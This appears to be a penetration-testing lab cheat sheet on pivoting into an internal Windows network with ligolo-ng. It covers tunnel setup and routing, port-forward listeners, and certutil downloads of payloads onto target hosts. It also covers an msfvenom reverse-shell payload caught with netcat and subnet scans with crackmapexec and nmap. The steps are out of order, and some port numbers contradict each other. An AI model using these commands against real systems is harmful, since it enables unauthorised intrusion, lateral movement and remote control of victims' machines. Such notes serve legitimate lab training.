Pivot w Ligolo
Step 7: Reverse Shell on MS02 & DC01
Step 6: File Transfers to MS02 & DC01
Network
Local port forward
Step 1: Setup Proxy
External network
Internal network
Step 5: Test Connection
Step 3: Connect to Session
Step 4: Establish Routing
Step 2: Run Agent
Tip

This step can be performed early on if needed. You may not necessarily need localadmin before performing internal enumeration.

  • Assess the situation
  • Assess the environments
  • And proceed in logical order

Use laddr if firewall restrictions apply

./proxy -laddr 0.0.0.0:443 -selfcert

Add interface to kali (use your own username)

sudo ip tuntap add user <username> mode tun ligolo

Enable interface

sudo ip link set ligolo up

Verify the ligolo interface is up

ifconfig

Start ligolo-ng proxy

./proxy -selfcert

ATTACKER - KALI

192.168.85.128

On the victim

agent.exe -connect <IP-KALI>:11601 -retry -ignore-cert 

sudo ip tuntap add user $USER mode tun ligolo

sudo ip link set ligolo up

sudo ip route add 240.0.0.1/32 dev ligolo

./proxy -selfcert

MS01

eth0: 192.168.85.136
eth1: 10.10.120.131

MS02

eth1: 10.10.120.130

DC01
eth1: 10.10.120.140

remote

Local port forward

https://medium.com/@Thigh_GoD/ligolo-ng-finally-adds-local-port-forwarding-5bf9b19609f9

./agent -connect <remote_ip>:11601 -retry -ignore-cert

On the target host (ms02 or dc01) download the required file(s)

certutil -urlcache -f http://10.10.120.131:8080/filename.exe shell.exe

IN THIS EXAMPLE:
If you want to download file to MS02 you could use the usual commands. But:

  • You need to use the Internal IP address on eth1 on MS01.
  • The webserver is running on port 80

Within the Ligolo proxy session setup a port forward from 8888 on "ms01" to your kali machine listening on port 80 (listen on all jumphost's internal IP)

listener_add --addr 10.10.120.131:8080 --to 127.0.0.1:80

listener_list

Start a web server on port 80

python3 -m http.server 80

on trgt

On the proxy server (ligolo-ng) setup a port forward from 1234 to our machine listening on 4444
Make sure to specify the internal IP of the jumphost!!!

listener_add --addr 10.10.120.131:443 --to 127.0.0.1:443

Show listeners

listener_list

On another terminal, create a reverse shell payload. You can also use powercat or other methods

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.120.131 LPORT=443 -f exe -o rev.exe

Setup a listener

nc -lvp 4444

On the target host (ms02 or dc01), download the reverse shell

certutil -urlcache -f http://10.10.120.131:8888/filename.exe shell.exe

Next, execute the reverse shell payload

.\rev.exe

IN THIS EXAMPLE:
If you want a reverse shell from MS02 or DC01 to your attackker machine...

  • You need to use the IP address on eth1 on MS01.
  • The reverse shell should connect to the first port declared in the add listener. In this example port 443.
  • The netcat listener should run on the second port specified. In this case 443

Since everything is set we should test it. Ping the DC 

ping 10.10.120.140

You can also use crackmapexec. We scan the whole subnet on the internal interface.

crackmapexec smb 10.10.120.0/24

nmap --top-ports=1000 -sT -Pn 10.10.120.130,10.10.120.140 --open

Open new terminal

sudo ip route add 10.10.120.0/24 dev ligolo

Check to see if the new route is added

ip route

On the ligolo session (from Step 1), enter session, then select the session ID (1), then enter start

session

>> 1
>> ifconfig (optional)
>>  start
>>  or 'tunnel_start'
Interactive Graph
Table Of Contents